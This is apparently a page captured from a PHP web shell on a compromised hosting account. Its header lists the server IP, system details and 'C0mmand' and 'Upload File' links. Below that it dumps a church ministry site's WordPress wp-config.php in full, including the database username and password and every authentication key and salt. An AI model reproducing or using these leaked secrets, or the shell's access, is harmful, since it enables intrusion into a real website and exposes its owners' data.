|
Server IP : 173.231.199.178 / Your IP : 216.73.216.46 Web Server : Apache System : Linux vps67388.inmotionhosting.com 3.10.0-1160.119.1.vz7.224.4 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64 User : koolde6 ( 1002) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/koolde6/holyspiritministrysatx.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'koolde6_wp' );
/** Database username */
define( 'DB_USER', 'koolde6_wp' );
/** Database password */
define( 'DB_PASSWORD', 'india@2022' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'QGT3{)U +8}>tD8-&,z0tEvkgFZz-0y1 r0SV~wdoWEp%5?hhf{r=kV+k7)bv 7+' );
define( 'SECURE_AUTH_KEY', '4oQLP>E*^keuHq7+g[htwvMaaCPP/Jb`WuguHfCl&{Zq,ds?IR.pVQ*hGE]>sL}6' );
define( 'LOGGED_IN_KEY', 'ax%ucMd5Iv%4b/1N>-Y`(+32|?*JiUEp~3l%Jr?WA}N+yzu }ixZLRGbV$K,c>Dp' );
define( 'NONCE_KEY', '7L#qVn=XcO$H3yq SQ6[x?vmg?}{q3)Y5^Ebl~ KW8CrJ+`GIT;!Pi+tMU_M~^,/' );
define( 'AUTH_SALT', 'CiyKW=0$lQ6qgjz_QicPKfGdjxkN-N#kVc4qzPd:[/n)yt$q{7Q*s~f0C%@sTtcE' );
define( 'SECURE_AUTH_SALT', '@VhRSjSM~M)UUmY)I.Ij>CEFeoZ/5RiVjByE^!1$!8-)6P&7LKq)5F#;4I!WaKM@' );
define( 'LOGGED_IN_SALT', ' Pma|e}D_v/;{VuF0~^l[LZ^b1a(55(&d66TB/6cycl-xIEJN?_h?cig%uTvD_sG' );
define( 'NONCE_SALT', '?Y;<?~<^fas[3__W-pb_p>?:{Ek:KAx3lhSc0HW0ok[3Y&+x`NwbpI!%$ZTY~/[c' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'kool_';
define( 'WP_HOME', 'https://holyspiritministrysatx.com' );
define( 'WP_SITEURL', 'https://holyspiritministrysatx.com' );
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';